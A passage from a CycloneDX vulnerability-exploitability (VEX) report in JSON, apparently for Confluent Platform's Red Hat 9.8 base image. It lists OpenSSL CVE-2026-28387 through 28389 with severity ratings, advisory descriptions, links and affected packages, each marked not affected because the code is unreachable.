          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libsmartcols@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libuuid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/util-linux-core@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/util-linux@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-28387",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        416
      ],
      "description": "Issue summary: An uncommon configuration of clients performing DANE TLSA-based\nserver authentication, when paired with uncommon server DANE TLSA records, may\nresult in a use-after-free and/or double-free on the client side.\n\nImpact summary: A use after free can have a range of potential consequences\nsuch as the corruption of valid data, crashes or execution of arbitrary code.\n\nHowever, the issue only affects clients that make use of TLSA records with both\nthe PKIX-TA(0/PKIX-EE(1) certificate usages and the DANE-TA(2) certificate\nusage.\n\nBy far the most common deployment of DANE is in SMTP MTAs for which RFC7672\nrecommends that clients treat as 'unusable' any TLSA records that have the PKIX\ncertificate usages.  These SMTP (or other similar) clients are not vulnerable\nto this issue.  Conversely, any clients that support only the PKIX usages, and\nignore the DANE-TA(2) usage are also not vulnerable.\n\nThe client would also need to be communicating with a server that publishes a\nTLSA RRset with both types of TLSA records.\n\nNo FIPS modules are affected by this issue, the problem code is outside the\nFIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-28387"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-28387"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/07e727d304746edb49a98ee8f6ab00256e1f012b"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/258a8f63b26995ba357f4326da00e19e29c6acbe"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/444958deaf450aea819171f97ae69eaedede42c3"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/7a4e08cee62a728d32e60b0de89e6764339df0a7"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/ec03fa050b3346997ed9c5fef3d0e16ad7db8177"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28387"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260407.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-28387"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/07/11"
        }
      ],
      "published": "2026-04-07T22:16:20+00:00",
      "updated": "2026-07-24T23:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-5.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-5.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-28388",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "Issue summary: When a delta CRL that contains a Delta CRL Indicator extension\nis processed a NULL pointer dereference might happen if the required CRL\nNumber extension is missing.\n\nImpact summary: A NULL pointer dereference can trigger a crash which\nleads to a Denial of Service for an application.\n\nWhen CRL processing and delta CRL processing is enabled during X.509\ncertificate verification, the delta CRL processing does not check\nwhether the CRL Number extension is NULL before dereferencing it.\nWhen a malformed delta CRL file is being processed, this parameter\ncan be NULL, causing a NULL pointer dereference.\n\nExploiting this issue requires the X509_V_FLAG_USE_DELTAS flag to be enabled in\nthe verification context, the certificate being verified to contain a\nfreshestCRL extension or the base CRL to have the EXFLAG_FRESHEST flag set, and\nan attacker to provide a malformed CRL to an application that processes it.\n\nThe vulnerability is limited to Denial of Service and cannot be escalated to\nachieve code execution or memory disclosure. For that reason the issue was\nassessed as Low severity according to our Security Policy.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,\nas the affected code is outside the OpenSSL FIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-28388"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-28388"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/59c3b3158553ab53275bbbccca5cb305d591cf2e"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/5a0b4930779cd2408880979db765db919da55139"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/602542f2c0c2d5edb47128f93eac10b62aeeefb3"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/a9d187dd1000130100fa7ab915f8513532cb3bb8"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/d3a901e8d9f021f3e67d6cfbc12e768129862726"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28388"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260407.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-28388"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/07/11"
        }
      ],
      "published": "2026-04-07T22:16:20+00:00",
      "updated": "2026-07-24T23:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-5.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-5.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-28389",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "Issue summary: During processing of a crafted CMS EnvelopedData message\nwith KeyAgreeRecipientInfo a NULL pointer dereference can happen.\n\nImpact summary: Applications that process attacker-controlled CMS data may\ncrash before authentication or cryptographic operations occur resulting in\nDenial of Service.\n\nWhen a CMS EnvelopedData message that uses KeyAgreeRecipientInfo is\nprocessed, the optional parameters field of KeyEncryptionAlgorithmIdentifier\nis examined without checking for its presence. This results in a NULL\npointer dereference if the field is missing.\n\nApplications and services that call CMS_decrypt() on untrusted input\n(e.g., S/MIME processing or CMS-based protocols) are vulnerable.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this\nissue, as the affected code is outside the OpenSSL FIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-28389"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-28389"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html"
        },
